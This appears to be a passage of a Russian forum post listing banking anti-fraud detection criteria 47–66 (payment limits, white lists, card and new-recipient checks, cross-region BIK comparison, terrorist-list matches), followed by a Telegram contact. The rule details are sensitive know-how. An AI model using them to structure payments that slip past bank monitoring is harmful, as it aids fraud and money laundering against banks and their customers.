                              47. Превышение лимита платежей на счет получателя Критерий срабатывает, если за анализируемый период количество платежей со счета клиента на счет получателя превышает указанное в настройках критерия значение
                              48. Присутствие получателя в общем белом списке Критерий срабатывает, если получатель платежа (счет/номер карты+БИК+ИНН) присутствует в справочнике «Белый список получателей»;
                              49. Присутствие получателя в клиентском белом списке Критерий срабатывает, если получатель платежа (счет/номер карты+БИК+ИНН) присутствует в справочнике «Справочник плательщиков» на вкладке «Белый список получателей»;
                              50. Платеж на карту Критерий срабатывает, если в качестве получателя платежа указан номер карты (числовая последовательность из 19/18/16/13 цифр)
                              51. Платеж на указанные маски счета Критерий срабатывает, если счет получателя платежа соответствует одной из масок, перечисленных в настройках критерия;
                              52. Сумма платежа меньше установленного лимита Критерий срабатывает, если в поле «Сумма платежа» значение суммы меньше указанного в настройках критерия значения;
                              53. Сумма платежа больше установленного лимита Критерий срабатывает, если в поле «Сумма платежа» значение суммы больше указанного в настройках критерия значения;
                              54. Платеж на нового получателя (банк) Критерий срабатывает, если ранее за всю историю загруженных в Систему платежей по Банку ни один из клиентов банка не отправлял платежей в пользу найденного счета получателя/номера карты, а сейчас такой платеж поступил;
                              55. Платеж на нового получателя (все счета клиента) Критерий срабатывает, если за анализируемый период ни с одного из счетов клиента платежей в пользу найденного счета получателя или номера карты не было, а сейчас такой платеж поступил;
                              56. Появление платежа в пользу юридического лица Критерий срабатывает при первом появлении платежа с данного счета плательщика в пользу любого юридического лица за анализируемый период.
                              57. Платеж на счет юридического лица Критерий срабатывает, если получателем платежа является юридическое лицо;
                              58. Платеж на депозитный счет Критерий срабатывает, если счетом получателя является депозитный счет физического лица;
                              59. Платеж в другой регион Критерий срабатывает, если 1-4 разряды слева БИК банка отправителя ? (не равно) 1-4 разряды слева БИК банка получателя.
                              60. Количество платежей со счетов разных плательщиков - клиентов банка в пользу данного получателя больше лимита Критерий срабатывает, если в пользу указанного в платежном документе получателя платежа (счет/номер карты+БИК) за анализируемый период отправлено платежей от уникальных отправителей больше (строго больше), чем указано в настройках критерия.
                              61. Присутствие получателя в справочнике террористов Критерий срабатывает, если ФИО из справочника террористов, указываемое в поле NAMEU, найдено в поле "Наименование получателя"
                              62. Присутствие отправителя в справочнике террористов Критерий срабатывает, если ФИО из справочника террористов, указываемое в поле NAMEU, найдено в поле "Наименование отправителя"
                              63. В назначении платежа найдено имя из справочника террористов Критерий срабатывает, если ФИО из справочника террористов, указываемое в поле NAMEU, найдено в поле "Назначение платежа"
                              64. Превышение лимита платежей на счет получателя (банк) Критерий срабатывает, если в пользу указанного в платежном документе получателя платежа (счет/номер карты+БИК) за анализируемый период отправлено платежей больше (строго больше), чем указано в настройках критерия.
                              65. Появление платежа на счет получателя с суммой выше средней (банк) Критерий срабатывает при поступлении платежа с суммой, превышающей среднюю сумму за анализируемый период времени с учетом допустимого отклонения.
                              66. Появление платежа в пользу нового получателя услуги Критерий срабатывает, если при оплате услуги в дополнительных параметрах документа содержится информация о получателе, на которого платежи ранее не отправлялись
                              Телега - @trener_dm
                              Ссылка https://t.me/trener_dm

                              Комментарий

                              Обработка...
                              X